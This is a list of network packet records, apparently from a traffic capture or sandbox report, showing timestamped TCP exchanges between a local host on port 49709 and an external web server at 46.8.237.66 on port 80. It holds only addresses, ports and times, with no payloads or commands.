                              Oct 30, 2024 20:19:02.956459045 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.956494093 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.956554890 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.956566095 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.956609964 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.042195082 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.042249918 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.042260885 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.042331934 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.074774027 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.074846983 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.074857950 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.074944973 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.074973106 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075009108 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075087070 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075088978 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.075098991 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075134039 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.075186968 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.075217009 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075227976 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075273991 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.075443029 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075517893 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075529099 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075572968 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.075659037 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075669050 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075728893 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.076076031 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.076087952 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.076133013 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.076136112 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.076195002 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.076427937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.076508999 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.076519966 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.076529980 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.076575041 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.076607943 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.161355019 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.161438942 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.161448002 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.161545038 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.194267035 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194336891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194345951 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194401979 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.194483995 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194495916 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194504976 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194550037 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.194647074 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.194685936 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194758892 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.194842100 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194853067 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194911003 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.194911003 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194921970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194931984 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194960117 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.195257902 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.195327997 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.195331097 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.195338011 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.195384026 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.195480108 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.195488930 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.195543051 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.272840977 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.272851944 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.272918940 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.273168087 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273221016 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273231983 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273261070 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.273350954 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273401976 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.273459911 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273530960 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273541927 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273557901 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273581028 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.273612022 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.273753881 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.314459085 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.314479113 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.314488888 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.314594984 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.314647913 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.357414961 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.357460022 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.357470989 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.357559919 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.391479969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.391539097 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.391550064 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.391561985 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.391618967 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.391722918 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.391736031 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.391751051 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.391762018 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.391813993 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.391844034 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.392009974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392020941 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392031908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392071962 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.392404079 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392414093 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392424107 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392435074 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392461061 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.392498016 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.392677069 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392688990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392699003 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392709017 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392735958 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.392766953 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.392797947 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392848969 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.392873049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392884970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392895937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.392927885 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.393135071 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393187046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393193960 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.393296957 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393307924 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393317938 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393357038 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.393410921 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.393553972 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393564939 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393574953 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393584013 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.393615007 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.393645048 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.435966015 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.436054945 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.436064959 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.436157942 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.477036953 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.477118015 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.477128029 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.477154016 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.477195024 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511115074 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511172056 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511182070 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511226892 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511264086 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511276007 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511348009 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511420012 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511430025 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511440039 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511470079 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511502981 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511579037 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511590958 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511600018 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511632919 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511724949 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511733055 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511786938 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511814117 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511826992 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511873960 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.511915922 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511926889 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.511977911 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.512118101 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512181997 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512186050 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.512192965 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512240887 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.512331009 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512341976 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512351990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512392998 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.512474060 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512484074 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512505054 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512520075 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.512527943 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.512559891 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.513026953 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.513036966 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.513046980 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.513057947 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.513083935 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.513113976 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.513114929 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.513164043 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.513191938 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.556149006 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.556201935 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.556335926 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.556792021 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.556876898 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.596801996 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.596883059 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.596893072 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.596967936 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.630733967 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.630800962 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.630805969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.630816936 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.630923033 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.630942106 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.630953074 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631087065 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631098986 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631098986 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631153107 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631155968 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631175041 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631231070 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631268024 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631278038 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631321907 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631347895 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631423950 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631434917 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631477118 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631494045 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631504059 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631546974 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631697893 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631747961 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631772995 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631782055 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.631835938 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.631999016 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632091999 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632102966 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632152081 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.632178068 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632189035 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632237911 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.632323027 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632333040 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632380962 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.632462025 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632473946 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632483959 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632493973 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632505894 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632536888 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.632592916 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.632747889 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632760048 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632770061 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.632812023 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.675390005 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.675442934 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.675462008 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.675473928 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.675518990 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.675585985 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.675652027 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.675709009 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.716430902 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.716449022 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.716458082 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.716505051 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.716526031 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.716573954 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.750250101 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750260115 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750300884 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750360966 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.750391960 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750401974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750411987 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750447989 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.750487089 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.750554085 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750658989 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750668049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750715971 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750722885 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.750726938 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750768900 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.750952959 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750965118 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.750974894 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751033068 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751034021 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751066923 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751211882 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751223087 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751233101 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751240969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751269102 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751302004 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751441002 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751492977 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751503944 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751513958 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751563072 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751593113 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751650095 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751658916 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751701117 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751888990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751899958 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.751950979 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.751987934 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752000093 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752043009 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752047062 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.752096891 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.752139091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752202988 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752213001 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752223969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752254963 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.752289057 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.752392054 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752403021 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752413034 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752417088 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.752485037 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.794907093 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.794961929 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.794971943 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.795056105 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.795087099 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.795099020 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.795109987 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.795156002 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.795192003 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.835999012 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.836047888 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.836057901 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.836208105 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.870060921 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870107889 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870117903 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870210886 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.870258093 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.870294094 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870304108 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870357990 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.870400906 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870412111 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870477915 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.870615959 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870626926 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870635986 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870670080 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.870771885 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870784044 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870793104 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.870822906 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.870853901 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.871068001 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:05.468689919 CET804970946.8.237.66192.168.2.6
